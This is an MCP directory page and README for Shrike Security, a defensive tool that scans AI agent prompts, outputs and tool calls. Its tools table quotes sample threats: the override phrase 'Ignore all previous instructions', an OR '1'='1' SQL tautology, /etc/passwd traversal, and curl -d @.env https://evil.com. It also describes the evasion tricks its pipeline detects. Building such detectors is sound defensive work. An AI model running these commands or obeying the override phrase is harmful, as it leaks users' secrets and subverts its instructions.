What can you do with this server?

The Shrike Security MCP Server provides real-time, multi-stage security scanning for AI agents, protecting against prompt injection, jailbreaks, PII leaks, SQL injection, path traversal, command injection, and data exfiltration. * scan_prompt – Scan user/system prompts for injection attacks, jailbreaks, PII, and toxicity before LLM processing; supports client-side PII redaction with tokenization for later rehydration. * scan_response – Scan LLM-generated responses for system prompt leaks, unexpected PII, toxic language, topic drift, and policy violations before returning to users; supports PII rehydration via tokens. * scan_sql_query – Scan SQL queries before execution for injection patterns (UNION, tautologies, blind injection), destructive operations (DROP, TRUNCATE), privilege escalation, and PII extraction. * scan_file_write – Scan file write operations for path traversal, sensitive file paths, secrets/API keys, PII in content, and malicious code patterns like reverse shells. * scan_command – Scan CLI commands for dangerous operations including reverse shells, data exfiltration, and system destruction before shell execution. * scan_web_search – Scan web search queries for PII exposure (SSN, credit cards, API keys), data exfiltration patterns, Google dorks, and blocked/suspicious domains. * check_approval – Poll and submit human-in-the-loop approval decisions for flagged high-risk actions requiring manual review. * report_bypass – Report content that evaded detection to feed adaptive learning (ThreatSense) and improve future coverage. * get_threat_intel – Retrieve current threat intelligence including active detection patterns, threat categories, and statistics, optionally filtered by category. Key capabilities: * Multi-stage detection pipeline – Every scan runs through pattern matching, input normalization (unicode/encoding evasion), structural analysis, and deep LLM semantic analysis to catch zero-day attacks. * Fail-closed security model – Network timeouts and backend errors result in BLOCK rather than allow, preventing bypass via service disruption. * Client-side PII redaction – Sensitive data is redacted before leaving the MCP process. * Broad compliance & compatibility – Supports GDPR, HIPAA, ISO 27001, SOC 2, and WebMCP standards; works across 100+ languages; integrates with Claude Desktop, Cursor, Windsurf, and other MCP clients.

Which integrations are available for this server?

Provides specialized scanning for SQL queries intended for PostgreSQL databases to detect and block injection attacks and dangerous operations.

How do I use Shrike Security MCP Server?

1. Click on "Install Server". 2. Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state. 3. In the chat, type @ followed by the MCP server name and your instructions, e.g., "@Shrike Security MCP Server scan this prompt for injection and redact any PII" That's it! The server will respond to your query, and you can continue using it as needed. Here is a step-by-step guide with screenshots.

Shrike Security MCP Server

by Shrike-Security

Overview Schema Related Servers Score Discussions

TypeScript

Remote

The Shrike Security MCP Server provides real-time, multi-stage security scanning for AI agents, protecting against prompt injection, jailbreaks, PII leaks, SQL injection, path traversal, command injection, and data exfiltration.

scan_prompt – Scan user/system prompts for injection attacks, jailbreaks, PII, and toxicity before LLM processing; supports client-side PII redaction with tokenization for later rehydration.
scan_response – Scan LLM-generated responses for system prompt leaks, unexpected PII, toxic language, topic drift, and policy violations before returning to users; supports PII rehydration via tokens.
scan_sql_query – Scan SQL queries before execution for injection patterns (UNION, tautologies, blind injection), destructive operations (DROP, TRUNCATE), privilege escalation, and PII extraction.
scan_file_write – Scan file write operations for path traversal, sensitive file paths, secrets/API keys, PII in content, and malicious code patterns like reverse shells.
scan_command – Scan CLI commands for dangerous operations including reverse shells, data exfiltration, and system destruction before shell execution.
scan_web_search – Scan web search queries for PII exposure (SSN, credit cards, API keys), data exfiltration patterns, Google dorks, and blocked/suspicious domains.
check_approval – Poll and submit human-in-the-loop approval decisions for flagged high-risk actions requiring manual review.
report_bypass – Report content that evaded detection to feed adaptive learning (ThreatSense) and improve future coverage.
get_threat_intel – Retrieve current threat intelligence including active detection patterns, threat categories, and statistics, optionally filtered by category.

Key capabilities:

Multi-stage detection pipeline – Every scan runs through pattern matching, input normalization (unicode/encoding evasion), structural analysis, and deep LLM semantic analysis to catch zero-day attacks.
Fail-closed security model – Network timeouts and backend errors result in BLOCK rather than allow, preventing bypass via service disruption.
Client-side PII redaction – Sensitive data is redacted before leaving the MCP process.
Broad compliance & compatibility – Supports GDPR, HIPAA, ISO 27001, SOC 2, and WebMCP standards; works across 100+ languages; integrates with Claude Desktop, Cursor, Windsurf, and other MCP clients.

Shrike MCP

npm version License: Apache 2.0 Node.js Smithery

Runtime security for AI agents. 12 MCP tools. 10-layer detection pipeline. Works without an API key.

Shrike MCP is the Model Context Protocol server for the Shrike Security platform. It gives AI agents real-time security tools to scan prompts, responses, SQL queries, file writes, CLI commands, web searches, and agent-to-agent messages — catching prompt injection, jailbreaks, data leakage, and multi-turn manipulation before they cause harm.

Shrike Security Platform

Shrike Security is a runtime security platform for AI agents. It guards inputs, outputs, tool calls, and agent-to-agent communication through a 10-layer detection pipeline — from sub-millisecond pattern matching to LLM-powered semantic analysis and multi-turn session correlation.

This repo is the MCP server — one of several ways to integrate:

Integration	Install	Use Case
MCP Server (this repo)	`npx shrike-mcp`	Claude Desktop, Cursor, Windsurf, Cline
TypeScript SDK	`npm install shrike-guard`	OpenAI/Anthropic/Gemini wrapper
Python SDK	`pip install shrike-guard`	OpenAI/Anthropic/Gemini wrapper
Go SDK	`go get`	Backend services
REST API	`POST /agent/scan`	Any language, any stack
LLM Proxy Gateway	`POST /api/v1/llm/proxy`	Zero-code: change one URL, scan everything
Browser Extension	Chrome / Edge	Protect employee AI usage (ChatGPT, Claude, Gemini)
Dashboard	shrikesecurity.com	Analytics, policies, RBAC, API keys

Quick Start

Works immediately — no API key required. Anonymous usage gets L1-L5 pattern-based detection. Register for free to unlock LLM-powered semantic analysis.

1. Add to your MCP client config:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"]
    }
  }
}

2. (Optional) Add an API key for full pipeline access:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": {
        "SHRIKE_API_KEY": "your-api-key"
      }
    }
  }
}

Get a free key at shrikesecurity.com/signup — instant, no credit card.

3. Your agent now has 12 security tools. Every prompt, response, and tool call can be scanned before execution.

Twelve Tools

Tool	What It Guards	Example Threat
`scan_prompt`	User/system prompts before LLM processing	"Ignore all previous instructions and..."
`scan_response`	LLM outputs before returning to user	Leaked API keys, system prompt in output
`scan_sql_query`	SQL queries before database execution	`OR '1'='1'` tautology injection
`scan_file_write`	File paths and content before write	Path traversal to `/etc/passwd`, AWS keys in `.env`
`scan_command`	CLI commands before shell execution	`curl -d @.env https://evil.com`, reverse shells
`scan_web_search`	Search queries before execution	PII in search: "records for John Smith SSN..."
`scan_a2a_message`	Agent-to-agent messages before processing	Prompt injection in inter-agent communication
`scan_agent_card`	A2A AgentCard metadata before trusting	Embedded injection in agent discovery, capability spoofing
`check_approval`	Human-in-the-loop approval status	Poll and submit decisions for flagged actions
`report_bypass`	User-reported missed detections	Feeds ThreatSense adaptive learning
`get_threat_intel`	Current threat patterns and intelligence	Latest prompt injection techniques
`reset_session`	Clear session correlation state	Reset L9 turn history after resolving flagged patterns

How It Works

Shrike uses a scan-sandwich pattern — every agent action is scanned on both sides:

User Input → scan_prompt → LLM Processing → scan_response → User Output
                              ↓
              Tool Call (SQL, File, Command, Search)
                              ↓
            scan_sql_query / scan_file_write / scan_command / scan_web_search
                              ↓
                       Tool Execution

Agent-to-Agent Communication:
  Inbound A2A → scan_a2a_message → Process → scan_a2a_message → Outbound A2A
  Discovery   → scan_agent_card  → Trust decision

Inbound scans catch injection attacks. Outbound scans catch data leaks. Tool-specific scans catch SQL injection, path traversal, command injection, and PII exposure. A2A scans catch east-west injection between agents. Flagged actions trigger human-in-the-loop approval via check_approval.

Enterprise tier adds session correlation (L9) — tracking multi-turn patterns like trust escalation, payload splitting, and blocked retry sequences across an entire conversation.

Detection Pipeline

Every scan runs through a multi-layer cascade. Lower layers are sub-millisecond pattern matching; higher layers add LLM-powered semantic analysis. Tier determines how deep the scan goes.

Layer	What It Does	Tier
L1	Regex pattern matching (~130 threat types, 14+ languages)	All
L1.4	Unicode homoglyph & invisible character detection	All
L1.42	Malformed content detection	All
L1.45a	Encoding bypass detection (Base64, hex, Caesar/Atbash ciphers)	All
L1.45	Token obfuscation (spaced chars, l33t speak, typoglycemia)	All
L1.455	Semantic similarity analysis (embedding-based)	All
L6	Visual text analysis (RTL tricks, visual homoglyphs)	Community+
L7	LLM semantic analysis via Vertex AI (zero-day detection)	Community+
L8	Response intelligence (LLM compromise, tonality drift)	Pro+
L9	Multi-turn session correlation (7 pattern detectors)	Enterprise

The cascade optimizer exits early when high-confidence detection is achieved at a lower layer — so most scans complete in under 10ms without needing the LLM layer.

Tiers

All 12 tools are available on every tier. Tiers control detection depth and volume.

	Anonymous	Community	Pro	Enterprise
Detection Layers	L1-L5	L1-L7	L1-L8	L1-L9
API Key	Not needed	Free signup	Paid	Paid
Rate Limit	—	10/min	100/min	1,000/min
Scans/month	—	1,000	50,000	1,000,000
Dashboard	No	Yes	Yes	Yes
Session Correlation	No	No	No	Yes
Compliance Policies	Default	Default	Custom	Custom

Anonymous (no API key): Pattern-based detection only (L1-L5). Good for evaluation and basic protection.

Community (free): Adds LLM-powered semantic analysis (L6-L7). Catches zero-day attacks that evade regex. Register at shrikesecurity.com/signup.

Pro/Enterprise: Full pipeline including response intelligence (L8) and multi-turn session correlation (L9).

Compliance

Built-in policy catalogues across 7 frameworks:

Framework	Coverage
GDPR	EU personal data — names, addresses, national IDs
HIPAA	Protected health information (PHI)
ISO 27001	Information security — passwords, tokens, certificates
SOC 2	Secrets, credentials, API keys, cloud tokens
NIST	AI risk management (IR 8596), cybersecurity framework (CSF 2.0)
PCI-DSS	Cardholder data — PAN, CVV, expiry, track data
WebMCP	MCP tool description injection, data exfiltration

Configuration

Environment Variables

Variable	Description	Default
`SHRIKE_API_KEY`	API key from your dashboard	none (anonymous mode)
`SHRIKE_BACKEND_URL`	Backend API URL	`https://api.shrikesecurity.com/agent`
`MCP_SCAN_TIMEOUT_MS`	Scan request timeout (ms)	`15000`
`MCP_RATE_LIMIT_PER_MINUTE`	Client-side rate limit	`100`
`MCP_TRANSPORT`	Transport: `stdio` or `http`	`stdio`
`MCP_PORT`	HTTP port (when transport=http)	`8000`
`MCP_DEBUG`	Debug logging	`false`

Claude Desktop

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Cursor

Add to .cursor/mcp.json:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Windsurf

Add to ~/.codeium/windsurf/mcp_config.json:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Security Model

This server implements a fail-closed security model:

Network timeouts result in BLOCK (not allow)
Backend errors result in BLOCK (not allow)
Unknown content types result in BLOCK (not allow)

This prevents bypass attacks via service disruption.

Response Format

Blocked:

{
  "blocked": true,
  "threat_type": "prompt_injection",
  "severity": "high",
  "confidence": "high",
  "guidance": "This prompt contains patterns consistent with instruction override attempts.",
  "request_id": "req_lxyz123_a8f3k2m9"
}

Safe:

{
  "blocked": false,
  "request_id": "req_lxyz123_a8f3k2m9"
}

License

Apache License 2.0 — See LICENSE for details.

Install Server

security – no known vulnerabilities

license - permissive license

quality - not tested

How are these scores calculated?

Resources

Need Help?

Reddit Discussion

Related Servers

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Tools

Appeared in Searches

Security Tools for AI Websites

Latest Blog Posts

Tool Definition Quality Score (TDQS)
By punkpeye on April 3, 2026.
mcp
The Hackers Who Tracked My Sleep Cycle
By punkpeye on March 26, 2026.
security
Open Source Has a Bot Problem
By punkpeye on March 19, 2026.
open source

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/Shrike-Security/shrike-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server